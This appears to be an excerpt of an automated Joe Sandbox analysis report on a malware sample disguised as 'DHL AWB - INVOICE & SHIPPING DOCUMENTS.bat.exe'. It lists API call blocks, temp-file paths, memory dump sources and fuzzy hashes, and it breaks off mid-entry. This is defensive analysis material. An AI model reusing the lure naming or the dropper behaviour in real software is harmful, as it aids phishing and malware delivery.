                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                            • Instruction ID: fce380eb4141a570f491a0e518fb8aa8e4aa376f46a8457bbd9b5af61eb39f7b
                                            • Opcode Fuzzy Hash: e1d6a9ee3c5b7c1e8a311aee8a429abf799163a7f8b121a70cc01e31e7316f78
                                            • Instruction Fuzzy Hash: AE210A72E00509AFDF15DF94DD45AAEBBB6FB48300F10407AF505F62A1CB389941DB58
                                            APIs
                                            • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CC3
                                            • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CDB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                            • Instruction ID: 290ea32ff0ec2f544a370e30947e4a0d8eefe4f8a949274a77cee2e27ce3354c
                                            • Opcode Fuzzy Hash: 6b7a83c98c9a4dd998c630d8be00bc685075749139b64b10b53530248dbe3f14
                                            • Instruction Fuzzy Hash: E121B471948209BFEF05AFA4DA86AAE7FB1EF44304F20447EF105B61D1C6B98681DB18
                                            APIs
                                            • lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                            • wsprintfA.USER32 ref: 00404C1C
                                            • SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s
                                            • API String ID: 3540041739-3551169577
                                            • Opcode ID: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                            • Instruction ID: 5f9a4297b7b6a3636d8a8bee3f83e4b2b5f26aab9c0b753bab98504590b6652f
                                            • Opcode Fuzzy Hash: 27895e53cc41a390800bf12e600d2f981ced9c779fa51419b0a61958e7e4186c
                                            • Instruction Fuzzy Hash: BE110A73A041243BEB0065AD9C45FAE3698DB85374F250237FE26F61D1EA78DC1281E9
                                            APIs
                                              • Part of subcall function 0040628D: lstrcpynA.KERNEL32(?,?,00000400,0040357B,Traveskoens Setup,NSIS Error,?,?,0000000A,?), ref: 0040629A
                                              • Part of subcall function 00405CB8: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,?,00405D24,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,767D3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"), ref: 00405CC6
                                              • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CCB
                                              • Part of subcall function 00405CB8: CharNextA.USER32(00000000), ref: 00405CDF
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,767D3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"), ref: 00405D60
                                            • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,767D3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,767D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405D70
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsxA376.tmp
                                            • API String ID: 3248276644-1100015901
                                            • Opcode ID: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                            • Instruction ID: 935e679f1c1c714b0e3911a5d698b339edd04cd04073ee9c7d5fe0644536c501
                                            • Opcode Fuzzy Hash: 308fadea3a0b968ed56b92214e6bc0f27c5543f8f515069d12591bb602a569a4
                                            • Instruction Fuzzy Hash: FCF02831105E511AE62233352C0DAAF1A44CE93364719857FF855B12D2DB3C89479D7D
                                            APIs
                                            • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 00405C25
                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033C5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,?,0000000A,?), ref: 00405C2E
                                            • lstrcatA.KERNEL32(?,0040A014,?,?,0000000A,?), ref: 00405C3F
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C1F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrcatlstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 2659869361-3355392842
                                            • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                            • Instruction ID: 5ecf558490c9fc18ca768c1c77fe203d25deaeb0153a8833875816b6af26cf17
                                            • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                            • Instruction Fuzzy Hash: 98D0A772505A306BE50136565D09ECB1A088F4231570500AFF140B2191C67C0C5147FD
                                            APIs
                                            • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,?,00405D24,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,C:\Users\user\AppData\Local\Temp\nsxA376.tmp,767D3410,?,C:\Users\user\AppData\Local\Temp\,00405A6F,?,767D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe"), ref: 00405CC6
                                            • CharNextA.USER32(00000000), ref: 00405CCB
                                            • CharNextA.USER32(00000000), ref: 00405CDF
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\nsxA376.tmp, xrefs: 00405CB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CharNext
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsxA376.tmp
                                            • API String ID: 3213498283-2048479901
                                            • Opcode ID: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                            • Instruction ID: ee8b6173ba6a0b3c7a77adf62d8f17896d3fbd5398f7dd7aaac8169870cad506
                                            • Opcode Fuzzy Hash: 48ab597918d8e2ef306ddd6e117c28a3ba6feb84c3778f0c5ad980b6008cf2cb
                                            • Instruction Fuzzy Hash: 42F02B51908FA02BFB3252246C48B775B8CDF95715F048477D5407B2C2C27C6C414F9A
                                            APIs
                                            • DestroyWindow.USER32(00000000,00000000,004030AB,00000001,?,?,00403722,?,?,?,0000000A,?), ref: 00402EE0
                                            • GetTickCount.KERNEL32 ref: 00402EFE
                                            • CreateDialogParamA.USER32(0000006F,00000000,00402E4A,00000000), ref: 00402F1B
                                            • ShowWindow.USER32(00000000,00000005,?,?,00403722,?,?,?,0000000A,?), ref: 00402F29
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                            • Instruction ID: 55e8d60830c64a568362c8f460213b41695a60035779f7009bf19f5ad348a086
                                            • Opcode Fuzzy Hash: 82cc071085b0e421d38bebfb76feb0ba11fa504106e74bc84e10844e5b096cab
                                            • Instruction Fuzzy Hash: B7F03A30A45621EBC771AB50FE0CA9B7B64FB05B59B41043AF001F11A9CB745852DBED
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 00405374
                                            • CallWindowProcA.USER32(?,?,?,?), ref: 004053C5
                                              • Part of subcall function 00404379: SendMessageA.USER32(00010494,00000000,00000000,00000000), ref: 0040438B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                            • Instruction ID: 98c6722e6a54b641667f931c9e29074c60bd52ab0debc5010bc9b6450a54dc72
                                            • Opcode Fuzzy Hash: b9d322c03724d0f4ccaad077e5ef09c26c8614d3de5af0662f84842769c694b6
                                            • Instruction Fuzzy Hash: 9201B171100608AFFF205F11ED84A6B3A26EB84794F50413BFE407A1D1C3B98C629E5E
                                            APIs
                                            • FreeLibrary.KERNEL32(?,767D3410,00000000,C:\Users\user\AppData\Local\Temp\,004039D9,004037BF,?,?,?,0000000A,?), ref: 00403A1B
                                            • GlobalFree.KERNEL32(0083C7C8), ref: 00403A22
                                            Strings
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403A01
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Free$GlobalLibrary
                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 1100898210-3355392842
                                            • Opcode ID: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                            • Instruction ID: 5c739cdb98e40ae8c0dfefb52ad11f1475293c83533685fd3a033b9eca192303
                                            • Opcode Fuzzy Hash: 0079c2f67775dda8b537f62a0fedec5a832efd40d4ebab5497539fb8ea7bc8ed
                                            • Instruction Fuzzy Hash: 16E01D3361513057CA315F45FD0579A77685F58B27F09403AE8807715587745D434FD9
                                            APIs
                                            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,80000000,00000003,?,?,00403722,?,?,?,0000000A), ref: 00405C6C
                                            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F9D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,C:\Users\user\Desktop\DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe,80000000,00000003,?,?,00403722,?), ref: 00405C7A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CharPrevlstrlen
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 2709904686-3370423016
                                            • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                            • Instruction ID: c418d430c32a25fd64e5672735cb35cda0f462e3a1cf334074a775347c04a98e
                                            • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                            • Instruction Fuzzy Hash: 62D0A7B240CEB02FF70362108D00B9F6A48CF13704F0904A7E080E2190C27C0C4147AD
                                            APIs
                                            • GlobalAlloc.KERNEL32(?,?), ref: 6F7A116B
                                            • GlobalAlloc.KERNEL32(?,?), ref: 6F7A11D8
                                            • GlobalFree.KERNEL32(?), ref: 6F7A1286
                                            • GlobalFree.KERNEL32(00000000), ref: 6F7A129B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1462661208.000000006F7A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6F7A0000, based on PE: true
                                            • Associated: 00000000.00000002.1462619508.000000006F7A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462725067.000000006F7A4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000000.00000002.1462782855.000000006F7A6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6f7a0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree
                                            • String ID:
                                            • API String ID: 3394109436-0
                                            • Opcode ID: 94aa1af5c8b4fb77c23f96ca76a34a5e282726959aee80b058b8c64b572aa913
                                            • Instruction ID: d8ac90652664e5e123a990d62ddc3ca0905abd9b1e4ef2aabb83eb49c1147e4e
                                            • Opcode Fuzzy Hash: 94aa1af5c8b4fb77c23f96ca76a34a5e282726959aee80b058b8c64b572aa913
                                            • Instruction Fuzzy Hash: 5D51D6756047059FEB01CF78DA48A6A7BE4FB86360B060676F545C7290D7B2E830CF91
                                            APIs
                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405DAD
                                            • CharNextA.USER32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DBE
                                            • lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1434611666.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1434581772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434641495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434673191.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1434917134.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: lstrlen$CharNextlstrcmpi
                                            • String ID:
                                            • API String ID: 190613189-0
                                            • Opcode ID: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                            • Instruction ID: 0b01db06aa3b468373a9359c006e34c779135354681a34c4aba1de8cdbfa9028
                                            • Opcode Fuzzy Hash: 4f1eaa0065bfc49b54b56e64601aea382fadfb9647de4ff4bb676f0ffe3a7a9e
                                            • Instruction Fuzzy Hash: 86F0C231100418AFC7029BA5CE0499EBBA8EF06250B2180AAE840F7211D674DE01AB6C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6347044812.0000000038DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DE0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_38de0000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Jr$$Jr$$Jr$$Jr$$Jr$$Jr
                                            • API String ID: 0-292652836
                                            • Opcode ID: ce572d5e2c6928c4c10b69a0eee3fa0799f67a7b2d0f248355d2e7ee29ac19f9
                                            • Instruction ID: 6b77e9c260799193b78b7d1e10930f59d909fcb2ec6c29363483c4a801f01c38
                                            • Opcode Fuzzy Hash: ce572d5e2c6928c4c10b69a0eee3fa0799f67a7b2d0f248355d2e7ee29ac19f9
                                            • Instruction Fuzzy Hash: F5223E34E10719CFDB14DBB9C85059DF7B2BFD9340F60C6AAE409AB264EB34A985CB40
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ed26cf51b72e4ed043b2d9240360250560e3bfb0942c464dc63623fc204d9411
                                            • Instruction ID: 3f24dd18d220b56d5b2caa55b7686c9c9f6c4e14f9926ffc2840d57dd04442dc
                                            • Opcode Fuzzy Hash: ed26cf51b72e4ed043b2d9240360250560e3bfb0942c464dc63623fc204d9411
                                            • Instruction Fuzzy Hash: 0F63E731D10B1A8ADB15EF68C8946E9F7B1FF99300F51C69AE45877121EB70AAC4CF81
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6320295383.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_110000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9bbdfb6c15b3e7d822b6678700737c50936b3dede60ad81aa059c4d4f373c52e
                                            • Instruction ID: 3a04abd40ae8dfd98df2c044c6fe5f2ec4b01378dba9b4b6e56f5422218740c7
